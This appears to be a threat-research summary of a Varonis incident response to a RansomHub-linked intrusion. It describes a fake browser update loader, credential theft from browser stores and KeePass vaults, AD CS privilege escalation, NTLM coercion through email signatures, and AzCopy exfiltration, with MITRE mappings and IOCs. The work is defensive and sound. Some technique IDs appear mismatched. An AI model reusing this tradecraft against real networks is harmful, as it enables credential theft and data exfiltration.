Threat Research

From CPU Spikes to Defense: How Varonis Prevented a Ransomware Disaster

Varonis
From CPU Spikes to Defense: How Varonis Prevented a Ransomware Disaster

A user executed a malicious JavaScript disguised as a browser update that led to a multi-stage intrusion tied to RansomHub affiliates using SocGhoulish, resulting in rapid credential theft, privilege escalation to Domain Admin, and mass data exfiltration via AzCopy. Varonis intervened within 48 hours, contained and remediated the threat with zero business downtime. #RansomHub #SocGhoulish #AzCopy

Keypoints

  • A user downloaded and executed a malicious JavaScript disguised as a browser update, initiating the compromise.
  • Automated reconnaissance and C2 activity immediately followed, including Active Directory enumeration and credential hunting in memory.
  • Persistence was achieved via a recurring Scheduled Task and an encrypted multi-layer Python-based SOCKS proxy deployed to %LOCALAPPDATA%ConnectedDevicesPlatform.
  • The attacker escalated to Domain Admin within ~4 hours, exploiting misconfigured AD CS certificates and abusing an ADFS account with SeTcbPrivilege on a read-only Domain Controller.
  • Attackers performed extensive discovery (network shares, browser DPAPI decryption attempts, and targeted opening of internal documentation with Office apps) and targeted domain admin laptops via RDP configuration changes.
  • Mass data exfiltration occurred ~24 hours after compromise using AzCopy; the activity caused a notable CPU spike that led to detection.
  • Varonis responded within 48 hours, identified IOCs and persistence, severed malicious access, and remediated the environment with no business downtime.

MITRE Techniques

  • [T1204] User Execution – Malicious JavaScript executed after a user downloaded a file presented as a legitimate browser update: “user downloaded and subsequently executed a file that they were led to believe was a legitimate browser update.”
  • [T1086] PowerShell – Credential hunting and local system queries, including DPAPI decryption attempts against browser stores, implied use of scripting for credential theft: “attempts to use Data Protection API (DPAPI) to decrypt passwords stored in the browsers from files.”
  • [T1053] Scheduled Task/Job – Second-stage malware deployed as a recurring Scheduled Task for persistence: “second-stage malware was deployed as a recurring Scheduled Task for persistence.”
  • [T1090] Proxy – Deployment of an encrypted Python script serving as a SOCKS proxy to pivot attacker infrastructure through the host: “an encrypted Python script that served as a SOCKS proxy with attacker infrastructure, exposing the corporate network directly over the Internet.”
  • [T1027] Obfuscated Files or Information – Multi-layered encryption/unpacking routine (10 layers) with randomized variable names and anti-analysis checks to hinder unpacking and analysis: “10 layers of multi-stage encryption…randomized variable names…VM detection, Debug detection, and Process Tracing detection.”
  • [T1003] OS Credential Dumping – Hunting for credentials in memory and searching for credential-containing files (OVPN, KeePass, etc.) and browser login databases: “hunting for credentials in memory…OVPN files, KeePass Vaults…Local State…Login Data.”
  • [T1136] Create Account / [T1137] Office Application Startup – Abusing accounts and Office applications to access internal documentation (using Word/Visio/Excel to open files of interest) to gather architectural information: “used installed copies of Word, Visio, and Excel to open specific files of interest about the internal architecture.”
  • [T1078] Valid Accounts – Use and abuse of ADFS and Domain Admin accounts with elevated tokens and SeTcbPrivilege to impersonate and escalate privileges: “ADFS account was observed authenticating…where it subsequently had administrative privileges…SeTcbPrivilege…allows the grantee to impersonate any other user.”
  • [T1550] Use of Alternate Authentication Material – Manipulation of email signatures to embed malicious image references to coerce NTLM authentication and harvest credentials: “manipulating all email signatures…embedding a malicious image reference…used on vulnerable clients to coerce an NTLM authentication attempt.”
  • [T1041] Exfiltration Over C2 Channel / [T1537] Transfer Data to Cloud Account – Use of AzCopy to transfer large volumes of data to external Azure Storage accounts for exfiltration: “the threat deployed AzCopy…used this to achieve mass data exfiltration across a few targeted directories.”
  • [T1569] System Services – Use of reg.exe, netsh.exe, and registry edits to enable RDP and open port 3389 for lateral access: “abused reg.exe and netsh.exe to configure appropriate registry settings to allow remote connections and ensure that port 3389 was open.”

Indicators of Compromise

  • [File Name] Malicious payloads and tools – examples: encrypted Python script in %LOCALAPPDATA%ConnectedDevicesPlatform, legitimate Python distribution placed in ConnectedDevicesPlatform.
  • [Scheduled Task] Persistence – recurring Scheduled Task name(s) observed – example task created for second-stage malware execution (specific task name not published).
  • [Tool] Data transfer utility – AzCopy used for exfiltration – example: AzCopy execution targeting Azure Storage Accounts.
  • [Registry/Service Changes] RDP enablement – registry modifications and use of netsh/reg.exe to open port 3389 and allow remote connections on targeted laptops.
  • [Email Artifact] Modified signature references – $env:APPDATAMicrosoftSignatures manipulated to include malicious image references for NTLM coercion.
  • [Credential Stores] Browser and vault locations targeted – examples: Chrome/Edge Login Data and Local State paths ($env:LOCALAPPDATA(Google|Microsoft)(Chrome|Edge)User DataDefaultLogin Data, and Local State), OVPN files and KeePass vaults.

Read more: https://www.varonis.com/blog/varonis-prevents-ransomware-disaster

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint